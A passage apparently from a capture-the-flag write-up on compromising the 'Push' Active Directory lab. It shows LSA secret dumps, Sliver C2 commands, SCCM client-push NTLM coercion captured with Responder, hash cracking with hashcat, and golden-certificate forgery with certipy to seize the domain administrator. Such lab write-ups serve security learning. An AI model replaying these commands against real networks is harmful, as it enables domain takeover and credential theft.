PUSH.VL/sccadmin:$DCC2$10240#sccadmin#0c59b319594744abea7f2db17a2fa65c: (2023-08-31 10:26:08)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
PUSH\MS01$:plain_password_hex:a8588fd11b4f63e1b5a84c2d2cdc4bcae3545f793c7228a77e1ad868edbb9e701ab3e81c4d8c864e58b3d7a01faaeff9facf4536a4129cdae629bdbf445c5a66e6bd6382f3e9184613bdb6031d6c0e04cd123e26ce746c5f0727e81e78ac7d69f2b9b7f5b5d8d8c5c8019e03a7333a5cca60683f3d9c72b0a828bcd04d36a0ba5fd99774d76d609d632641a2047be57041bd3d331872416ba5309f323219cd8d2c608e17153e731a689adfcf7a0163d84477cc1f2d60d63a61b5056a15d2ab00394db19fe60c91380a6495a824b63bf3008de0dbd74b044b5e04a4741f71a1dd224fc60e35c19eb226848814b101c6f6
PUSH\MS01$:aad3b435b51404eeaad3b435b51404ee:31fd133d27babb3790e451b6aeea7886:::
[*] DefaultPassword
PUSH\kelly.hill:ShinraTensei!
[*] DPAPI_SYSTEM
dpapi_machinekey:0x83f7bbd4976dba3418fe397e76d9690c06ee3691
dpapi_userkey:0xe2af091346d181301ff638320e3246e49b9b637c
[*] NL$KM
0000 B6 96 C7 7E 17 8A 0C DD 8C 39 C2 0A A2 91 24 44 ...~.....9....$D
0010 A2 E4 4D C2 09 59 46 C0 7F 95 EA 11 CB 7F CB 72 ..M..YF........r
0020 EC 2E 5A 06 01 1B 26 FE 6D A7 88 0F A5 E7 1F A5 ..Z...&.m.......
0030 96 CD E5 3F A0 06 5E C1 A5 01 A1 CE 8C 24 76 95 ...?..^......$v.
NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
[*] Cleaning up...
[*] Stopping service RemoteRegistryPath 2: Privilege Escalation via SCCM NTLM Relay
Discovering the MS01 is a Certificate Authority Server
sliver (http-vulnlabs-4444) > sa-adcs-enum
[*] Successfully executed sa-adcs-enum (coff-loader)
[*] Got output:
[*] Found 1 CAs in the domain
[*] Listing info for CN=CA,CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=push,DC=vl
Enterprise CA Name : CA
DNS Hostname : MS01.push.vl
Flags : SUPPORTS_NT_AUTHENTICATION CA_SERVERTYPE_ADVANCED
Expiration : 1 years
CA Cert :
Subject Name : DC=vl, DC=push, CN=CA
Thumbprint : 9dd0081d82796853df4bfb79b3057c5aeaf0b15b
Serial Number : 72533888abc96d43a299917a621b857d
Start Date : 8/31/2023 07:25:21
End Date : 8/31/3022 07:35:21
Chain : DC=vl, DC=push, CN=CA
<SNIF>Discovering Microsoft Endpoint Configuration Manager installed on MS01
# echo 'Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select DisplayName,DisplayVersion,InstallLocation' | base64 -w0 | xclip -sel clip
sliver (http-vulnlabs-4444) > sharpsh -- '-e -c R2V0LUl0ZW1Qcm9wZXJ0eSBIS0xNOlxTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxVbmluc3RhbGxcKiB8IFNlbGVjdCBEaXNwbGF5TmFtZSxEaXNwbGF5VmVyc2lvbixJbnN0YWxsTG9jYXRpb24K'
[*] sharpsh output:
DisplayName DisplayVersion InstallLocation
----------- -------------- ---------------
Amazon EC2Launch 2.0.1521.0
Microsoft .NET Host - 7.0.10 (x64) 56.43.64668
aws-cfn-bootstrap 2.0.26
Configuration Manager Client 5.00.9111.1000
<SNIF>sliver (http-vulnlabs-4444) > execute-assembly /home/Intrusionz3r0/Documents/Tools/SharpCollection/NetFramework_4.7_x64/SharpSCCM.exe local site-info
[*] Output:
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Connecting to \\127.0.0.1\root\CCM
[+] Executing WQL query: SELECT Name,CurrentManagementPoint FROM SMS_Authority
-----------------------------------
SMS_Authority
-----------------------------------
CurrentManagementPoint: DC01.push.vl
Name: SMS:HQ0
-----------------------------------
[+] Completed execution in 00:00:00.2286036
Coercing SCCM NTLM Authentication
sliver (http-vulnlabs-4444) > sharpsccm invoke client-push -t 10.8.5.48
[*] sharpsccm output:
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: DC01.push.vl
[+] Site code: HQ0
[+] Created "ConfigMgr Client Messaging" certificate in memory for device registration and signing/encrypting subsequent messages
[+] Reusable Base64-encoded certificate:
308209D20201033082098E06092A864886F70D010701A082097F0482097B308209773082059006092A864886F70D010701A08205810482057D3082057930820575060B2A864886F70D010C0A0102A08204EE308204EA301C060A2A864886F70D010C0103300E04081E4870643C705F7F020207D0048204C866080A6B3DAD8CDD40432D2C12B2BE58F2FB4F790B1D2312E08F94313ACE7793D01FE8F97235A7FB9197F436C48EFCB0315305B476320718BD46D02C96A1FEBCF084A5B11B08FD32A6DC2E857412CE9B25E3A983D0F7FB3C5D1C801EBBB0CA7B61D4730D4B3EA53F248D18AACD21C1E6A09E1AD8405357E2CA1EBE8DDEFCE6805193F8CCE11D318B88741EAA3C99087894BCE39CFBB0F30AC928D88B112D658284EF9766AA5C0D28E03AC5969C4C276FA767C5C6FE24119CB5436C12E997DD6D1CCCA76FBBC81725E14160DCBD9E12585E79D5871EC774A93A910B7D40E52BFF7B76875AF0EDE16A7E06A2437FBA8B66AF5A2BEE3A2CB3C19B17ECA752885FF4106BD4B20CCAE4FAD8E187BAC16B9D5DBFC70B10ECB41CC6A35282B43BC35846E3A165B3BC78E2DFC6FE3A075334BC2BE0F21C821A25F6B024370345A1B3764AF2A523C3DEAA7897500AC06A65E37FF836456EEA3A45560E319B5250A4639BBB117488FDBCB3F591A4425749ACF27C3018E25E6932BDF353E3CFE5AD4717CB55B1A5FD42FE1AB4070AC33C054085B95F912AB3DA84FA961DFE87EBF2DFAC80050C74E417E7B12D1318B8D99AD13F2650F7D82E611A0B3A690109DBABBF994B32623D4D50DB3F47F4520715317EAA6D67461312D9A9E166C257FE17F1BCB3E633E31B696EB0A5A986BD9DB0397166234414D0CF9F148337DE037E79571E651D29184F335E2DBB6D6E9E7B2632114A8FA7E8D1C30B7522F7F8C9C232C1890D805C6AE22111D6C324716C33352D9D86D2952CAAD59F53846C1C754ECBABD5E6ED60CE14FB5201F9214298FCC0A3D11530F87FD7A4A4E12E350083331BC3CEFB22BAD73A89313F6DC64A3137251F260262DCC9CBF5C91969B322148795014B41859AEF3BE6801CFDEB96C7CB4EE204113A6351A38E957CAD4F2309207B2351C5F4AA0FB9F29538E16979B363E12C1E538F7BECAEE18F7C24BB19DCE0FCF4912E46FBFFC29BAFF58B75178086AF18204C837035732DEA32A0BFEDB94A7A09BEED2F9EABF475C806B39DA04DC89D27AD96E1CCB6E9B095EE1B13B37F64493CF5BA0C64D73C21C1F39ECF59C87AB9FE794456F3D976D4E2A6B20F59C517DB4F84E7262AF6ABF101F620373CD462985CB7362E09A750ED6D8100E169ECA8D99FCBD7F3A327DFCDA818524A061F1B57164E8BA0EB14B9421534E467B11A46D0736A438702FE04BADCA5C9BB03C7D451F7B923343374E850EA4AB248B346D2663A10A2EEB7948D5C78A6D73AB45A3077F354CA67D83F8E9C38752C31A8C34F25E107658C78B36C85F6C5E3C33F59B7DA809A0D8F42BEA014F6DE5B133135EE25A7AB48AC33915076968864D5DCC9D03C387FEE670D24FB729154E8D3B74DD195EFEC1C2037AA5AB5C8480EF15A08644971AD20127AFC7C99BBE76A91999823A0B69E1681061F8983CB4855A6F0D0254331909B7F227D075AA874476D5B3C70FE0BAD536FF7CED381BECBD6D9FBD67AE1BBF23E6163A192A01BF2D682774099F0950F4215CF49F34BA65B915BD6CFA01ED017825147031E3F1C75F47572B98F3FA59EA74B605DFFA7B89E14C04E3E22B9AD751B6D437CF8D49A5476939FC992478120B134377A2D5FDC8519AB28B597F1BD896EB375D02AF18706F6AD9AEC23D1D979CCAD9DC21F50749CB7327207AB86FB13B0B0F503502F677B100F2A09D94F0708C1EF3E20E81C0DEED3B2AD3174301306092A864886F70D0109153106040401000000305D06092B060104018237110131501E4E004D006900630072006F0073006F0066007400200053006F0066007400770061007200650020004B00650079002000530074006F0072006100670065002000500072006F00760069006400650072308203DF06092A864886F70D010706A08203D0308203CC020100308203C506092A864886F70D010701301C060A2A864886F70D010C0103300E040874F81FC3C6A7ED45020207D0808203989B825DA04F323EFF224EF499EE6C592DDD06F60092F58145E9D33EFF20245547CB040CA3095E751D84B9D2888B46119B21D88028F308152B7DE411A43BC81F30D72917E382B4B157B3DE2BC5B5769AA59C734B4FDC21529BA15453DF09DB8766E68FA901DEEC66630CFF7C758BF38DAC145CC6109EEC755B0398EF85405239BDADE93AD11AE6E46F3D77F9AF1DB6B1E546995532BD183F9109BABD9ADF33989D8BCA2B54B54D129D43E71D2D20AD8B73DE204FDEC3B61A1B994A2E7EF335CA63F254D65EB484C59CBD126AA5E675982C786E3D6062F5254EBE8DF33645FBC91238B8E4E73C59044E0C2F273AB99E4C787575981EA753E4031C25BA0FD859D60FA3274F2E3B293536FC3FC0662D6E6BB9B99BDF2BDC3BC512C9E80BC7EBA492284BBC1CF70354E1F64771ECCCEE166AF6B9224D2C2F0B8609967ABEA6E92D017520A7853D3FED66FB96D4F1EFDC47034508FEDEFD6B372C69B971766CB712567A3E7582F230B755D71DA0EC2122EE2C24DB3C52E50C410995A7BA94E76CC6C8635052237DCF4C7718B8E17388DB5B413D03756C86A510E19AAD0FAF16939811E0DF5B98D6C3DD91A259D3142B1258630945F51BA65CCA510205FFD7C282AD927533BA317821D50E1B0D99F9CB68AE198CEE7DAD2D08D8873E4A000320923285DDF2C4D7DF17080927D64549FF0540C03A7892314767C17785D4DAC4968071AC6FB655B590D4496198D5B3664C048480DE91ACCEEF3B0403D7732DE1FAB692148F9D9C7B6616D669DE5339B3DC15061CC76D881D0769420BE75F35FBDB4EB22783A55CBC3FE61E700232B179DBF2EC55120F8D4E52BBE75E9E27C11C1A9963A9D7BCC609E0D62CC12F29A236A7AA590CAB9E5445233803E3323934BA2434179A0C9305A646B2FCB317EA3B22D98FC45DB09D6A211F97D31CCCB7A55F1797D3EBA855EDCC2D3130FBA068C52270D033D70A9C8BF774E2CC198A6667D6E74E7257F21BF64CCEC0F838DE791850ABB75BCA20D3F9BB7B85D8026C8A366AB9A0FAB3F3341B6A5E8B93FBD919F5DEFBB09C3A178ACDEA08A451D1FEED45961382F16A82EE538706FDD9C9C218B253663CEE2C487F276391E2BF838D1E6C454F4226E9B2F99838787F56C690E9D9B4C116E180A3F2A699B1EC54CF1D35B6CA18EFCE751D02998B4036836B6F81278ED0EE692ECA6E03807DA309E572AB24E1299E8A632541B02259DFAD21A8D6CB6101A6C680C59F52DE00EADB329BF09B6801226C4C7A328F45B40C9F0936653F94CC1D8A6D7C01A65B1678A7BB67303B301F300706052B0E03021A04146F8FF3B5C5B15E1F36C51A3D899C34F33E9A9C9A0414FC814D0775146019B99313D7630C216362EA93AE020207D0
[+] Discovering local properties for client registration request
[+] Modifying client registration request properties:
FQDN: 10.8.5.48
NetBIOS name: 10.8.5.48
Site code: HQ0
[+] Sending HTTP registration request to DC01.push.vl:80
[+] Received unique SMS client GUID for new device:
GUID:A6D63769-A669-41FD-BAD4-1FBCB0399C01
[+] Discovering local properties for DDR inventory report
[+] Modifying DDR and inventory report properties
[+] Discovered PlatformID: Microsoft Windows NT Advanced Server 10.0
[+] Modified PlatformID: Microsoft Windows NT Workstation 2010.0
[+] Sending DDR from GUID:A6D63769-A669-41FD-BAD4-1FBCB0399C01 to MP_DdrEndpoint endpoint on DC01.push.vl:HQ0 and requesting client installation on 10.8.5.48
[+] Completed execution in 00:00:06.4432509Retrieving NTLMv2 Hashes
❯ sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.5.0
[SMB] NTLMv2-SSP Client : 10.10.170.85
[SMB] NTLMv2-SSP Username : PUSH\sccadmin
[SMB] NTLMv2-SSP Hash : sccadmin::PUSH:aaaaaaaaaaaaaaaa:5b4978cb8424d7817455c8d75be9caac:0101000000000000006bc5f088c3db0189535b04c9036121000000000100100077006300700045004e004200450054000300100077006300700045004e00420045005400020010006d00490072005a004d0049007a006500040010006d00490072005a004d0049007a00650007000800006bc5f088c3db0106000400020000000800300030000000000000000000000000400000a4466ef19d5811bb4240ed56c011010ce7eda97943f24e4c68de6c803f22f8000a0010000000000000000000000000000000000009001c0063006900660073002f00310030002e0038002e0035002e00340038000000000000000000
[SMB] NTLMv2-SSP Client : 10.10.170.85
[SMB] NTLMv2-SSP Username : PUSH\DC01$
[SMB] NTLMv2-SSP Hash : DC01$::PUSH:aaaaaaaaaaaaaaaa:93a4f8afc63fa09c142a924c8ac28a9d:010100000000000080015ef188c3db0179175cc0b27c3f02000000000100100077006300700045004e004200450054000300100077006300700045004e00420045005400020010006d00490072005a004d0049007a006500040010006d00490072005a004d0049007a0065000700080080015ef188c3db0106000400020000000800300030000000000000000000000000400000a4466ef19d5811bb4240ed56c011010ce7eda97943f24e4c68de6c803f22f8000a0010000000000000000000000000000000000009001c0063006900660073002f00310030002e0038002e0035002e00340038000000000000000000Cracking sccadmin's NTLMv2 hash
❯ hashcat -m 5600 sccadmin /usr/share/wordlists/rockyou.txt
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
SCCADMIN::PUSH:4a38e3a4e3ca2b52:2dd5c9b84c96005d00225ed382dc85fd:0101000000000000009c113df2c2db01bfaa5559084859260000000002000800300045005900510001001e00570049004e002d0031003000560052004700440049004c004d004200570004003400570049004e002d0031003000560052004700440049004c004d00420057002e0030004500590051002e004c004f00430041004c000300140030004500590051002e004c004f00430041004c000500140030004500590051002e004c004f00430041004c0007000800009c113df2c2db0106000400020000000800300030000000000000000000000000400000b4f4ce1a26e269913204d2ddfc3349df74620108e39a9e05f08f2dbe04a91a2c0a0010000000000000000000000000000000000009001c0063006900660073002f00310030002e0038002e0035002e00340038000000000000000000:7ujm&UJMCredentials found: sccadmin:7ujm&UJM
Compromise Domain Controler DC01
Path: 1 Golden Certificate Attack
❯ certipy-ad forge -ca-pfx CA.pfx -upn administrator@push.vl -subject 'CN=Administrator,CN=Users,DC=PUSH,DC=VL'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Saved forged certificate and private key to 'administrator_forged.pfx'
❯ certipy-ad auth -pfx administrator_forged.pfx -username Administrator -domain push.vl -dc-ip 10.10.170.85
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@push.vl
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERROR_CLIENT_NOT_TRUSTED(Reserved for PKINIT)
❯ certipy-ad auth -pfx administrator_forged.pfx -username Administrator -domain push.vl -dc-ip 10.10.170.85 -ldap-shell
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Connecting to 'ldaps://10.10.170.85:636'
[*] Authenticated to '10.10.170.85' as: u:PUSH\Administrator
Type help for list of commands
# change_password Administrator Password123!
Got User DN: CN=Administrator,CN=Users,DC=push,DC=vl
Attempting to set new password of: Password123!
Password changed successfully!❯ xfreerdp /v:DC01 /u:Administrator /p:Password123! /dynamic-resolution
Path 2: Create a vulnerable template
Last updated